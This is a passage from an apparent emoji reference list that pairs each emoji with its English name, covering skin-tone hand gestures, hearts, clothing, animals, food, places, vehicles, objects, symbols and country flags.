👐🏾 Open Hands: Medium-Dark Skin Tone
👐🏿 Open Hands: Dark Skin Tone
🙌 Raising Hands
🙌🏻 Raising Hands: Light Skin Tone
🙌🏼 Raising Hands: Medium-Light Skin Tone
🙌🏽 Raising Hands: Medium Skin Tone
🙌🏾 Raising Hands: Medium-Dark Skin Tone
🙌🏿 Raising Hands: Dark Skin Tone
🤲 Palms Up Together
🤲🏻 Palms Up Together: Light Skin Tone
🤲🏼 Palms Up Together: Medium-Light Skin Tone
🤲🏽 Palms Up Together: Medium Skin Tone
🤲🏾 Palms Up Together: Medium-Dark Skin Tone
🤲🏿 Palms Up Together: Dark Skin Tone
🙏 Folded Hands
🙏🏻 Folded Hands: Light Skin Tone
🙏🏼 Folded Hands: Medium-Light Skin Tone
🙏🏽 Folded Hands: Medium Skin Tone
🙏🏾 Folded Hands: Medium-Dark Skin Tone
🙏🏿 Folded Hands: Dark Skin Tone
🤝 Handshake
💅 Nail Polish
💅🏻 Nail Polish: Light Skin Tone
💅🏼 Nail Polish: Medium-Light Skin Tone
💅🏽 Nail Polish: Medium Skin Tone
💅🏾 Nail Polish: Medium-Dark Skin Tone
💅🏿 Nail Polish: Dark Skin Tone
👂 Ear
👂🏻 Ear: Light Skin Tone
👂🏼 Ear: Medium-Light Skin Tone
👂🏽 Ear: Medium Skin Tone
👂🏾 Ear: Medium-Dark Skin Tone
👂🏿 Ear: Dark Skin Tone
👃 Nose
👃🏻 Nose: Light Skin Tone
👃🏼 Nose: Medium-Light Skin Tone
👃🏽 Nose: Medium Skin Tone
👃🏾 Nose: Medium-Dark Skin Tone
👃🏿 Nose: Dark Skin Tone
👣 Footprints
👀 Eyes
👁 Eye
👁️🗨️ Eye in Speech Bubble
🧠 Brain
👅 Tongue
👄 Mouth
💋 Kiss Mark
💘 Heart With Arrow
❤ Red Heart
💓 Beating Heart
💔 Broken Heart
💕 Two Hearts
💖 Sparkling Heart
💗 Growing Heart
💙 Blue Heart
💚 Green Heart
💛 Yellow Heart
🧡 Orange Heart
💜 Purple Heart
🖤 Black Heart
💝 Heart With Ribbon
💞 Revolving Hearts
💟 Heart Decoration
❣ Heavy Heart Exclamation
💌 Love Letter
💤 Zzz
💢 Anger Symbol
💣 Bomb
💥 Collision
💦 Sweat Droplets
💨 Dashing Away
💫 Dizzy
💬 Speech Balloon
🗨 Left Speech Bubble
🗯 Right Anger Bubble
💭 Thought Balloon
🕳 Hole
👓 Glasses
🕶 Sunglasses
👔 Necktie
👕 T-Shirt
👖 Jeans
🧣 Scarf
🧤 Gloves
🧥 Coat
🧦 Socks
👗 Dress
👘 Kimono
👙 Bikini
👚 Woman’s Clothes
👛 Purse
👜 Handbag
👝 Clutch Bag
🛍 Shopping Bags
🎒 School Backpack
👞 Man’s Shoe
👟 Running Shoe
👠 High-Heeled Shoe
👡 Woman’s Sandal
👢 Woman’s Boot
👑 Crown
👒 Woman’s Hat
🎩 Top Hat
🎓 Graduation Cap
🧢 Billed Cap
⛑ Rescue Worker’s Helmet
📿 Prayer Beads
💄 Lipstick
💍 Ring
💎 Gem Stone
🐵 Monkey Face
🐒 Monkey
🦍 Gorilla
🐶 Dog Face
🐕 Dog
🐩 Poodle
🐺 Wolf Face
🦊 Fox Face
🐱 Cat Face
🐈 Cat
🦁 Lion Face
🐯 Tiger Face
🐅 Tiger
🐆 Leopard
🐴 Horse Face
🐎 Horse
🦄 Unicorn Face
🦓 Zebra
🦌 Deer
🐮 Cow Face
🐂 Ox
🐃 Water Buffalo
🐄 Cow
🐷 Pig Face
🐖 Pig
🐗 Boar
🐽 Pig Nose
🐏 Ram
🐑 Ewe
🐐 Goat
🐪 Camel
🐫 Two-Hump Camel
🦒 Giraffe
🐘 Elephant
🦏 Rhinoceros
🐭 Mouse Face
🐁 Mouse
🐀 Rat
🐹 Hamster Face
🐰 Rabbit Face
🐇 Rabbit
🐿 Chipmunk
🦔 Hedgehog
🦇 Bat
🐻 Bear Face
🐨 Koala
🐼 Panda Face
🐾 Paw Prints
🦃 Turkey
🐔 Chicken
🐓 Rooster
🐣 Hatching Chick
🐤 Baby Chick
🐥 Front-Facing Baby Chick
🐦 Bird
🐧 Penguin
🕊 Dove
🦅 Eagle
🦆 Duck
🦉 Owl
🐸 Frog Face
🐊 Crocodile
🐢 Turtle
🦎 Lizard
🐍 Snake
🐲 Dragon Face
🐉 Dragon
🦕 Sauropod
🦖 T-Rex
🐳 Spouting Whale
🐋 Whale
🐬 Dolphin
🐟 Fish
🐠 Tropical Fish
🐡 Blowfish
🦈 Shark
🐙 Octopus
🐚 Spiral Shell
🦀 Crab
🦐 Shrimp
🦑 Squid
🐌 Snail
🦋 Butterfly
🐛 Bug
🐜 Ant
🐝 Honeybee
🐞 Lady Beetle
🦗 Cricket
🕷 Spider
🕸 Spider Web
🦂 Scorpion
💐 Bouquet
🌸 Cherry Blossom
💮 White Flower
🏵 Rosette
🌹 Rose
🥀 Wilted Flower
🌺 Hibiscus
🌻 Sunflower
🌼 Blossom
🌷 Tulip
🌱 Seedling
🌲 Evergreen Tree
🌳 Deciduous Tree
🌴 Palm Tree
🌵 Cactus
🌾 Sheaf of Rice
🌿 Herb
☘ Shamrock
🍀 Four Leaf Clover
🍁 Maple Leaf
🍂 Fallen Leaf
🍃 Leaf Fluttering in Wind
🍇 Grapes
🍈 Melon
🍉 Watermelon
🍊 Tangerine
🍋 Lemon
🍌 Banana
🍍 Pineapple
🍎 Red Apple
🍏 Green Apple
🍐 Pear
🍑 Peach
🍒 Cherries
🍓 Strawberry
🥝 Kiwi Fruit
🍅 Tomato
🥥 Coconut
🥑 Avocado
🍆 Eggplant
🥔 Potato
🥕 Carrot
🌽 Ear of Corn
🌶 Hot Pepper
🥒 Cucumber
🥦 Broccoli
🍄 Mushroom
🥜 Peanuts
🌰 Chestnut
🍞 Bread
🥐 Croissant
🥖 Baguette Bread
🥨 Pretzel
🥞 Pancakes
🧀 Cheese Wedge
🍖 Meat on Bone
🍗 Poultry Leg
🥩 Cut of Meat
🥓 Bacon
🍔 Hamburger
🍟 French Fries
🍕 Pizza
🌭 Hot Dog
🥪 Sandwich
🌮 Taco
🌯 Burrito
🥙 Stuffed Flatbread
🥚 Egg
🍳 Cooking
🥘 Shallow Pan of Food
🍲 Pot of Food
🥣 Bowl With Spoon
🥗 Green Salad
🍿 Popcorn
🥫 Canned Food
🍱 Bento Box
🍘 Rice Cracker
🍙 Rice Ball
🍚 Cooked Rice
🍛 Curry Rice
🍜 Steaming Bowl
🍝 Spaghetti
🍠 Roasted Sweet Potato
🍢 Oden
🍣 Sushi
🍤 Fried Shrimp
🍥 Fish Cake With Swirl
🍡 Dango
🥟 Dumpling
🥠 Fortune Cookie
🥡 Takeout Box
🍦 Soft Ice Cream
🍧 Shaved Ice
🍨 Ice Cream
🍩 Doughnut
🍪 Cookie
🎂 Birthday Cake
🍰 Shortcake
🥧 Pie
🍫 Chocolate Bar
🍬 Candy
🍭 Lollipop
🍮 Custard
🍯 Honey Pot
🍼 Baby Bottle
🥛 Glass of Milk
☕ Hot Beverage
🍵 Teacup Without Handle
🍶 Sake
🍾 Bottle With Popping Cork
🍷 Wine Glass
🍸 Cocktail Glass
🍹 Tropical Drink
🍺 Beer Mug
🍻 Clinking Beer Mugs
🥂 Clinking Glasses
🥃 Tumbler Glass
🥤 Cup With Straw
🥢 Chopsticks
🍽 Fork and Knife With Plate
🍴 Fork and Knife
🥄 Spoon
🔪 Kitchen Knife
🏺 Amphora
🌍 Globe Showing Europe-Africa
🌎 Globe Showing Americas
🌏 Globe Showing Asia-Australia
🌐 Globe With Meridians
🗺 World Map
🗾 Map of Japan
🏔 Snow-Capped Mountain
⛰ Mountain
🌋 Volcano
🗻 Mount Fuji
🏕 Camping
🏖 Beach With Umbrella
🏜 Desert
🏝 Desert Island
🏞 National Park
🏟 Stadium
🏛 Classical Building
🏗 Building Construction
🏘 House
🏙 Cityscape
🏚 Derelict House
🏠 House
🏡 House With Garden
🏢 Office Building
🏣 Japanese Post Office
🏤 Post Office
🏥 Hospital
🏦 Bank
🏨 Hotel
🏩 Love Hotel
🏪 Convenience Store
🏫 School
🏬 Department Store
🏭 Factory
🏯 Japanese Castle
🏰 Castle
💒 Wedding
🗼 Tokyo Tower
🗽 Statue of Liberty
⛪ Church
🕌 Mosque
🕍 Synagogue
⛩ Shinto Shrine
🕋 Kaaba
⛲ Fountain
⛺ Tent
🌁 Foggy
🌃 Night With Stars
🌄 Sunrise Over Mountains
🌅 Sunrise
🌆 Cityscape at Dusk
🌇 Sunset
🌉 Bridge at Night
♨ Hot Springs
🌌 Milky Way
🎠 Carousel Horse
🎡 Ferris Wheel
🎢 Roller Coaster
💈 Barber Pole
🎪 Circus Tent
🎭 Performing Arts
🖼 Framed Picture
🎨 Artist Palette
🎰 Slot Machine
🚂 Locomotive
🚃 Railway Car
🚄 High-Speed Train
🚅 High-Speed Train With Bullet Nose
🚆 Train
🚇 Metro
🚈 Light Rail
🚉 Station
🚊 Tram
🚝 Monorail
🚞 Mountain Railway
🚋 Tram Car
🚌 Bus
🚍 Oncoming Bus
🚎 Trolleybus
🚐 Minibus
🚑 Ambulance
🚒 Fire Engine
🚓 Police Car
🚔 Oncoming Police Car
🚕 Taxi
🚖 Oncoming Taxi
🚗 Automobile
🚘 Oncoming Automobile
🚙 Sport Utility Vehicle
🚚 Delivery Truck
🚛 Articulated Lorry
🚜 Tractor
🚲 Bicycle
🛴 Kick Scooter
🛵 Motor Scooter
🚏 Bus Stop
🛣 Motorway
🛤 Railway Track
⛽ Fuel Pump
🚨 Police Car Light
🚥 Horizontal Traffic Light
🚦 Vertical Traffic Light
🚧 Construction
🛑 Stop Sign
⚓ Anchor
⛵ Sailboat
🛶 Canoe
🚤 Speedboat
🛳 Passenger Ship
⛴ Ferry
🛥 Motor Boat
🚢 Ship
✈ Airplane
🛩 Small Airplane
🛫 Airplane Departure
🛬 Airplane Arrival
💺 Seat
🚁 Helicopter
🚟 Suspension Railway
🚠 Mountain Cableway
🚡 Aerial Tramway
🛰 Satellite
🚀 Rocket
🛸 Flying Saucer
🛎 Bellhop Bell
🚪 Door
🛏 Bed
🛋 Couch and Lamp
🚽 Toilet
🚿 Shower
🛁 Bathtub
⌛ Hourglass
⏳ Hourglass With Flowing Sand
⌚ Watch
⏰ Alarm Clock
⏱ Stopwatch
⏲ Timer Clock
🕰 Mantelpiece Clock
🕛 Twelve O’clock
🕧 Twelve-Thirty
🕐 One O’clock
🕜 One-Thirty
🕑 Two O’clock
🕝 Two-Thirty
🕒 Three O’clock
🕞 Three-Thirty
🕓 Four O’clock
🕟 Four-Thirty
🕔 Five O’clock
🕠 Five-Thirty
🕕 Six O’clock
🕡 Six-Thirty
🕖 Seven O’clock
🕢 Seven-Thirty
🕗 Eight O’clock
🕣 Eight-Thirty
🕘 Nine O’clock
🕤 Nine-Thirty
🕙 Ten O’clock
🕥 Ten-Thirty
🕚 Eleven O’clock
🕦 Eleven-Thirty
🌑 New Moon
🌒 Waxing Crescent Moon
🌓 First Quarter Moon
🌔 Waxing Gibbous Moon
🌕 Full Moon
🌖 Waning Gibbous Moon
🌗 Last Quarter Moon
🌘 Waning Crescent Moon
🌙 Crescent Moon
🌚 New Moon Face
🌛 First Quarter Moon With Face
🌜 Last Quarter Moon With Face
🌡 Thermometer
☀ Sun
🌝 Full Moon With Face
🌞 Sun With Face
⭐ White Medium Star
🌟 Glowing Star
🌠 Shooting Star
☁ Cloud
⛅ Sun Behind Cloud
⛈ Cloud With Lightning and Rain
🌤 Sun Behind Small Cloud
🌥 Sun Behind Large Cloud
🌦 Sun Behind Rain Cloud
🌧 Cloud With Rain
🌨 Cloud With Snow
🌩 Cloud With Lightning
🌪 Tornado
🌫 Fog
🌬 Wind Face
🌀 Cyclone
🌈 Rainbow
🌂 Closed Umbrella
☂ Umbrella
☔ Umbrella With Rain Drops
⛱ Umbrella on Ground
⚡ High Voltage
❄ Snowflake
☃ Snowman
⛄ Snowman Without Snow
☄ Comet
🔥 Fire
💧 Droplet
🌊 Water Wave
🎃 Jack-O-Lantern
🎄 Christmas Tree
🎆 Fireworks
🎇 Sparkler
✨ Sparkles
🎈 Balloon
🎉 Party Popper
🎊 Confetti Ball
🎋 Tanabata Tree
🎍 Pine Decoration
🎎 Japanese Dolls
🎏 Carp Streamer
🎐 Wind Chime
🎑 Moon Viewing Ceremony
🎀 Ribbon
🎁 Wrapped Gift
🎗 Reminder Ribbon
🎟 Admission Tickets
🎫 Ticket
🎖 Military Medal
🏆 Trophy
🏅 Sports Medal
🥇 1st Place Medal
🥈 2nd Place Medal
🥉 3rd Place Medal
⚽ Soccer Ball
⚾ Baseball
🏀 Basketball
🏐 Volleyball
🏈 American Football
🏉 Rugby Football
🎾 Tennis
🎱 Pool 8 Ball
🎳 Bowling
🏏 Cricket
🏑 Field Hockey
🏒 Ice Hockey
🏓 Ping Pong
🏸 Badminton
🥊 Boxing Glove
🥋 Martial Arts Uniform
🥅 Goal Net
🎯 Direct Hit
⛳ Flag in Hole
⛸ Ice Skate
🎣 Fishing Pole
🎽 Running Shirt
🎿 Skis
🛷 Sled
🥌 Curling Stone
🎮 Video Game
🕹 Joystick
🎲 Game Die
♠ Spade Suit
♥ Heart Suit
♦ Diamond Suit
♣ Club Suit
🃏 Joker
🀄 Mahjong Red Dragon
🎴 Flower Playing Cards
🔇 Muted Speaker
🔈 Speaker Low Volume
🔉 Speaker Medium Volume
🔊 Speaker High Volume
📢 Loudspeaker
📣 Megaphone
📯 Postal Horn
🔔 Bell
🔕 Bell With Slash
🎼 Musical Score
🎵 Musical Note
🎶 Musical Notes
🎙 Studio Microphone
🎚 Level Slider
🎛 Control Knobs
🎤 Microphone
🎧 Headphone
📻 Radio
🎷 Saxophone
🎸 Guitar
🎹 Musical Keyboard
🎺 Trumpet
🎻 Violin
🥁 Drum
📱 Mobile Phone
📲 Mobile Phone With Arrow
☎ Telephone
📞 Telephone Receiver
📟 Pager
📠 Fax Machine
🔋 Battery
🔌 Electric Plug
💻 Laptop Computer
🖥 Desktop Computer
🖨 Printer
⌨ Keyboard
🖱 Computer Mouse
🖲 Trackball
💽 Computer Disk
💾 Floppy Disk
💿 Optical Disk
📀 DVD
🎥 Movie Camera
🎞 Film Frames
📽 Film Projector
🎬 Clapper Board
📺 Television
📷 Camera
📸 Camera With Flash
📹 Video Camera
📼 Videocassette
🔍 Left-Pointing Magnifying Glass
🔎 Right-Pointing Magnifying Glass
🔬 Microscope
🔭 Telescope
📡 Satellite Antenna
🕯 Candle
💡 Light Bulb
🔦 Flashlight
🏮 Red Paper Lantern
📔 Notebook With Decorative Cover
📕 Closed Book
📖 Open Book
📗 Green Book
📘 Blue Book
📙 Orange Book
📚 Books
📓 Notebook
📒 Ledger
📃 Page With Curl
📜 Scroll
📄 Page Facing Up
📰 Newspaper
🗞 Rolled-Up Newspaper
📑 Bookmark Tabs
🔖 Bookmark
🏷 Label
💰 Money Bag
💴 Yen Banknote
💵 Dollar Banknote
💶 Euro Banknote
💷 Pound Banknote
💸 Money With Wings
💳 Credit Card
💹 Chart Increasing With Yen
💱 Currency Exchange
💲 Heavy Dollar Sign
✉ Envelope
📧 E-Mail
📨 Incoming Envelope
📩 Envelope With Arrow
📤 Outbox Tray
📥 Inbox Tray
📦 Package
📫 Closed Mailbox With Raised Flag
📪 Closed Mailbox With Lowered Flag
📬 Open Mailbox With Raised Flag
📭 Open Mailbox With Lowered Flag
📮 Postbox
🗳 Ballot Box With Ballot
✏ Pencil
✒ Black Nib
🖋 Fountain Pen
🖊 Pen
🖌 Paintbrush
🖍 Crayon
📝 Memo
💼 Briefcase
📁 File Folder
📂 Open File Folder
🗂 Card Index Dividers
📅 Calendar
📆 Tear-Off Calendar
🗒 Spiral Notepad
🗓 Spiral Calendar
📇 Card Index
📈 Chart Increasing
📉 Chart Decreasing
📊 Bar Chart
📋 Clipboard
📌 Pushpin
📍 Round Pushpin
📎 Paperclip
🖇 Linked Paperclips
📏 Straight Ruler
📐 Triangular Ruler
✂ Scissors
🗃 Card File Box
🗄 File Cabinet
🗑 Wastebasket
🔒 Locked
🔓 Unlocked
🔏 Locked With Pen
🔐 Locked With Key
🔑 Key
🗝 Old Key
🔨 Hammer
⛏ Pick
⚒ Hammer and Pick
🛠 Hammer and Wrench
🗡 Dagger
⚔ Crossed Swords
🔫 Pistol
🏹 Bow and Arrow
🛡 Shield
🔧 Wrench
🔩 Nut and Bolt
⚙ Gear
🗜 Clamp
⚗ Alembic
⚖ Balance Scale
🔗 Link
⛓ Chains
💉 Syringe
💊 Pill
🚬 Cigarette
⚰ Coffin
⚱ Funeral Urn
🗿 Moai
🛢 Oil Drum
🔮 Crystal Ball
🛒 Shopping Cart
🏧 Atm Sign
🚮 Litter in Bin Sign
🚰 Potable Water
♿ Wheelchair Symbol
🚹 Men’s Room
🚺 Women’s Room
🚻 Restroom
🚼 Baby Symbol
🚾 Water Closet
🛂 Passport Control
🛃 Customs
🛄 Baggage Claim
🛅 Left Luggage
⚠ Warning
🚸 Children Crossing
⛔ No Entry
🚫 Prohibited
🚳 No Bicycles
🚭 No Smoking
🚯 No Littering
🚱 Non-Potable Water
🚷 No Pedestrians
📵 No Mobile Phones
🔞 No One Under Eighteen
☢ Radioactive
☣ Biohazard
⬆ Up Arrow
↗ Up-Right Arrow
➡ Right Arrow
↘ Down-Right Arrow
⬇ Down Arrow
↙ Down-Left Arrow
⬅ Left Arrow
↖ Up-Left Arrow
↕ Up-Down Arrow
↔ Left-Right Arrow
↩ Right Arrow Curving Left
↪ Left Arrow Curving Right
⤴ Right Arrow Curving Up
⤵ Right Arrow Curving Down
🔃 Clockwise Vertical Arrows
🔄 Anticlockwise Arrows Button
🔙 Back Arrow
🔚 End Arrow
🔛 On! Arrow
🔜 Soon Arrow
🔝 Top Arrow
🛐 Place of Worship
⚛ Atom Symbol
🕉 Om
✡ Star of David
☸ Wheel of Dharma
☯ Yin Yang
✝ Latin Cross
☦ Orthodox Cross
☪ Star and Crescent
☮ Peace Symbol
🕎 Menorah
🔯 Dotted Six-Pointed Star
♈ Aries
♉ Taurus
♊ Gemini
♋ Cancer
♌ Leo
♍ Virgo
♎ Libra
♏ Scorpius
♐ Sagittarius
♑ Capricorn
♒ Aquarius
♓ Pisces
⛎ Ophiuchus
🔀 Shuffle Tracks Button
🔁 Repeat Button
🔂 Repeat Single Button
▶ Play Button
⏩ Fast-Forward Button
⏭ Next Track Button
⏯ Play or Pause Button
◀ Reverse Button
⏪ Fast Reverse Button
⏮ Last Track Button
🔼 Up Button
⏫ Fast Up Button
🔽 Down Button
⏬ Fast Down Button
⏸ Pause Button
⏹ Stop Button
⏺ Record Button
⏏ Eject Button
🎦 Cinema
🔅 Dim Button
🔆 Bright Button
📶 Antenna Bars
📳 Vibration Mode
📴 Mobile Phone Off
♀ Female Sign
♂ Male Sign
⚕ Medical Symbol
♻ Recycling Symbol
⚜ Fleur-De-Lis
🔱 Trident Emblem
📛 Name Badge
🔰 Japanese Symbol for Beginner
⭕ Heavy Large Circle
✅ White Heavy Check Mark
☑ Ballot Box With Check
✔ Heavy Check Mark
✖ Heavy Multiplication X
❌ Cross Mark
❎ Cross Mark Button
➕ Heavy Plus Sign
➖ Heavy Minus Sign
➗ Heavy Division Sign
➰ Curly Loop
➿ Double Curly Loop
〽 Part Alternation Mark
✳ Eight-Spoked Asterisk
✴ Eight-Pointed Star
❇ Sparkle
‼ Double Exclamation Mark
⁉ Exclamation Question Mark
❓ Question Mark
❔ White Question Mark
❕ White Exclamation Mark
❗ Exclamation Mark
〰 Wavy Dash
© Copyright
® Registered
™ Trade Mark
#️⃣ Keycap Number Sign
*️⃣ Keycap Asterisk
0️⃣ Keycap Digit Zero
1️⃣ Keycap Digit One
2️⃣ Keycap Digit Two
3️⃣ Keycap Digit Three
4️⃣ Keycap Digit Four
5️⃣ Keycap Digit Five
6️⃣ Keycap Digit Six
7️⃣ Keycap Digit Seven
8️⃣ Keycap Digit Eight
9️⃣ Keycap Digit Nine
🔟 Keycap 10
💯 Hundred Points
🔠 Input Latin Uppercase
🔡 Input Latin Lowercase
🔢 Input Numbers
🔣 Input Symbols
🔤 Input Latin Letters
🅰 A Button (blood Type)
🆎 Ab Button (blood Type)
🅱 B Button (blood Type)
🆑 CL Button
🆒 Cool Button
🆓 Free Button
ℹ Information
🆔 ID Button
Ⓜ Circled M
🆕 New Button
🆖 NG Button
🅾 O Button (blood Type)
🆗 OK Button
🅿 P Button
🆘 SOS Button
🆙 Up! Button
🆚 Vs Button
🈁 Japanese “here” Button
🈂 Japanese “service Charge” Button
🈷 Japanese “monthly Amount” Button
🈶 Japanese “not Free of Charge” Button
🈯 Japanese “reserved” Button
🉐 Japanese “bargain” Button
🈹 Japanese “discount” Button
🈚 Japanese “free of Charge” Button
🈲 Japanese “prohibited” Button
🉑 Japanese “acceptable” Button
🈸 Japanese “application” Button
🈴 Japanese “passing Grade” Button
🈳 Japanese “vacancy” Button
㊗ Japanese “congratulations” Button
㊙ Japanese “secret” Button
🈺 Japanese “open for Business” Button
🈵 Japanese “no Vacancy” Button
▪ Black Small Square
▫ White Small Square
◻ White Medium Square
◼ Black Medium Square
◽ White Medium-Small Square
◾ Black Medium-Small Square
⬛ Black Large Square
⬜ White Large Square
🔶 Large Orange Diamond
🔷 Large Blue Diamond
🔸 Small Orange Diamond
🔹 Small Blue Diamond
🔺 Red Triangle Pointed Up
🔻 Red Triangle Pointed Down
💠 Diamond With a Dot
🔘 Radio Button
🔲 Black Square Button
🔳 White Square Button
⚪ White Circle
⚫ Black Circle
🔴 Red Circle
🔵 Blue Circle
🏁 Chequered Flag
🚩 Triangular Flag
🎌 Crossed Flags
🏴 Black Flag
🏳 White Flag
🏳️🌈 Rainbow Flag
🇦🇨 Ascension Island
🇦🇩 Andorra
🇦🇪 United Arab Emirates
🇦🇫 Afghanistan
🇦🇬 Antigua & Barbuda
🇦🇮 Anguilla
🇦🇱 Albania
🇦🇲 Armenia
🇦🇴 Angola
🇦🇶 Antarctica
🇦🇷 Argentina
🇦🇸 American Samoa
🇦🇹 Austria
🇦🇺 Australia
🇦🇼 Aruba
🇦🇽 Åland Islands
🇦🇿 Azerbaijan
🇧🇦 Bosnia & Herzegovina
🇧🇧 Barbados
🇧🇩 Bangladesh
🇧🇪 Belgium
🇧🇫 Burkina Faso
🇧🇬 Bulgaria
🇧🇭 Bahrain
🇧🇮 Burundi
🇧🇯 Benin
🇧🇱 St. Barthélemy
🇧🇲 Bermuda
🇧🇳 Brunei
🇧🇴 Bolivia
🇧🇶 Caribbean Netherlands
🇧🇷 Brazil
🇧🇸 Bahamas
🇧🇹 Bhutan
🇧🇻 Bouvet Island
🇧🇼 Botswana
🇧🇾 Belarus
🇧🇿 Belize
🇨🇦 Canada
🇨🇨 Cocos (Keeling) Islands
🇨🇩 Congo - Kinshasa
🇨🇫 Central African Republic
🇨🇬 Congo - Brazzaville
🇨🇭 Switzerland
🇨🇮 Côte D’Ivoire
🇨🇰 Cook Islands
🇨🇱 Chile
🇨🇲 Cameroon
🇨🇳 China
🇨🇴 Colombia
🇨🇵 Clipperton Island
🇨🇷 Costa Rica
🇨🇺 Cuba
🇨🇻 Cape Verde
🇨🇼 Curaçao
🇨🇽 Christmas Island
🇨🇾 Cyprus
🇨🇿 Czechia
🇩🇪 Germany
🇩🇬 Diego Garcia
🇩🇯 Djibouti
🇩🇰 Denmark
🇩🇲 Dominica
🇩🇴 Dominican Republic
🇩🇿 Algeria
🇪🇦 Ceuta & Melilla
🇪🇨 Ecuador
🇪🇪 Estonia
🇪🇬 Egypt
🇪🇭 Western Sahara
🇪🇷 Eritrea
🇪🇸 Spain
🇪🇹 Ethiopia
🇪🇺 European Union
🇫🇮 Finland
🇫🇯 Fiji
🇫🇰 Falkland Islands
🇫🇲 Micronesia
🇫🇴 Faroe Islands
🇫🇷 France
🇬🇦 Gabon
🇬🇧 United Kingdom
🇬🇩 Grenada
🇬🇪 Georgia
🇬🇫 French Guiana
🇬🇬 Guernsey
🇬🇭 Ghana
🇬🇮 Gibraltar
🇬🇱 Greenland
🇬🇲 Gambia
🇬🇳 Guinea
🇬🇵 Guadeloupe
🇬🇶 Equatorial Guinea
🇬🇷 Greece
🇬🇸 South Georgia & South Sandwich Islands
🇬🇹 Guatemala
🇬🇺 Guam
🇬🇼 Guinea-Bissau
🇬🇾 Guyana
🇭🇰 Hong Kong Sar China
🇭🇲 Heard & Mcdonald Islands
🇭🇳 Honduras
🇭🇷 Croatia
🇭🇹 Haiti
🇭🇺 Hungary
🇮🇨 Canary Islands
🇮🇩 Indonesia
🇮🇪 Ireland
🇮🇱 Israel
🇮🇲 Isle of Man
🇮🇳 India
🇮🇴 British Indian Ocean Territory
🇮🇶 Iraq
🇮🇷 Iran
🇮🇸 Iceland
🇮🇹 Italy
🇯🇪 Jersey
🇯🇲 Jamaica
🇯🇴 Jordan
🇯🇵 Japan
🇰🇪 Kenya
🇰🇬 Kyrgyzstan
🇰🇭 Cambodia
🇰🇮 Kiribati
🇰🇲 Comoros
🇰🇳 St. Kitts & Nevis
🇰🇵 North Korea
🇰🇷 South Korea
🇰🇼 Kuwait
🇰🇾 Cayman Islands
🇰🇿 Kazakhstan
🇱🇦 Laos
🇱🇧 Lebanon
🇱🇨 St. Lucia
🇱🇮 Liechtenstein
🇱🇰 Sri Lanka
🇱🇷 Liberia
🇱🇸 Lesotho
🇱🇹 Lithuania
🇱🇺 Luxembourg
🇱🇻 Latvia
🇱🇾 Libya
🇲🇦 Morocco
🇲🇨 Monaco
🇲🇩 Moldova
🇲🇪 Montenegro
🇲🇫 St. Martin
🇲🇬 Madagascar
🇲🇭 Marshall Islands
🇲🇰 Macedonia
🇲🇱 Mali
🇲🇲 Myanmar (Burma)
🇲🇳 Mongolia
🇲🇴 Macau Sar China
🇲🇵 Northern Mariana Islands
🇲🇶 Martinique
🇲🇷 Mauritania
🇲🇸 Montserrat
🇲🇹 Malta
🇲🇺 Mauritius
🇲🇻 Maldives
🇲🇼 Malawi
🇲🇽 Mexico
🇲🇾 Malaysia
🇲🇿 Mozambique
🇳🇦 Namibia
🇳🇨 New Caledonia
🇳🇪 Niger
🇳🇫 Norfolk Island
🇳🇬 Nigeria
🇳🇮 Nicaragua
🇳🇱 Netherlands
🇳🇴 Norway
🇳🇵 Nepal
🇳🇷 Nauru
🇳🇺 Niue
🇳🇿 New Zealand
🇴🇲 Oman
🇵🇦 Panama
🇵🇪 Peru
🇵🇫 French Polynesia
🇵🇬 Papua New Guinea
🇵🇭 Philippines
🇵🇰 Pakistan
🇵🇱 Poland
🇵🇲 St. Pierre & Miquelon
🇵🇳 Pitcairn Islands
🇵🇷 Puerto Rico
🇵🇸 Palestinian Territories
🇵🇹 Portugal
🇵🇼 Palau
🇵🇾 Paraguay
🇶🇦 Qatar
🇷🇪 Réunion
🇷🇴 Romania
🇷🇸 Serbia
🇷🇺 Russia
🇷🇼 Rwanda
🇸🇦 Saudi Arabia
🇸🇧 Solomon Islands
🇸🇨 Seychelles
🇸🇩 Sudan
🇸🇪 Sweden
🇸🇬 Singapore
🇸🇭 St. Helena
🇸🇮 Slovenia
🇸🇯 Svalbard & Jan Mayen
🇸🇰 Slovakia
🇸🇱 Sierra Leone
🇸🇲 San Marino
🇸🇳 Senegal
🇸🇴 Somalia
🇸🇷 Suriname
🇸🇸 South Sudan
🇸🇹 São Tomé & Príncipe
🇸🇻 El Salvador
🇸🇽 Sint Maarten
🇸🇾 Syria
🇸🇿 Swaziland
🇹🇦 Tristan Da Cunha
🇹🇨 Turks & Caicos Islands
🇹🇩 Chad
🇹🇫 French Southern Territories
🇹🇬 Togo
🇹🇭 Thailand
🇹🇯 Tajikistan
🇹🇰 Tokelau
🇹🇱 Timor-Leste
🇹🇲 Turkmenistan
🇹🇳 Tunisia
🇹🇴 Tonga
🇹🇷 Turkey
🇹🇹 Trinidad & Tobago
🇹🇻 Tuvalu
🇹🇼 Taiwan
🇹🇿 Tanzania
🇺🇦 Ukraine
🇺🇬 Uganda
🇺🇲 U.S. Outlying Islands
🇺🇳 United Nations
🇺🇸 United States
🇺🇾 Uruguay
🇺🇿 Uzbekistan
🇻🇦 Vatican City
🇻🇨 St. Vincent & Grenadines
🇻🇪 Venezuela
🇻🇬 British Virgin Islands
🇻🇮 U.S. Virgin Islands
🇻🇳 Vietnam
🇻🇺 Vanuatu
🇼🇫 Wallis & Futuna
🇼🇸 Samoa
🇽🇰 Kosovo
🇾🇪 Yemen
🇾🇹 Mayotte
🇿🇦 South Africa
🇿🇲 Zambia
🇿🇼 Zimbabwe
🏴 Flag for England (GB-ENG)
🏴 Flag for Scotland (GB-SCT)
🏴 Flag for Wales (GB-WLS)
🥆 Rifle
🤻 Modern Pentathlon
🏴☠️ Pirate Flag
🇦 Regional Indicator Symbol Letter A
🇧 Regional Indicator Symbol Letter B
🇨 Regional Indicator Symbol Letter C
🇩 Regional Indicator Symbol Letter D
🇪 Regional Indicator Symbol Letter E
🇫 Regional Indicator Symbol Letter F
🇬 Regional Indicator Symbol Letter G
🇭 Regional Indicator Symbol Letter H
🇮 Regional Indicator Symbol Letter I
🇯 Regional Indicator Symbol Letter J
🇰 Regional Indicator Symbol Letter K
🇱 Regional Indicator Symbol Letter L
🇲 Regional Indicator Symbol Letter M
🇳 Regional Indicator Symbol Letter N
🇴 Regional Indicator Symbol Letter O
🇵 Regional Indicator Symbol Letter P
🇶 Regional Indicator Symbol Letter Q
🇷 Regional Indicator Symbol Letter R
🇸 Regional Indicator Symbol Letter S
🇹 Regional Indicator Symbol Letter T
🇺 Regional Indicator Symbol Letter U
🇻 Regional Indicator Symbol Letter V
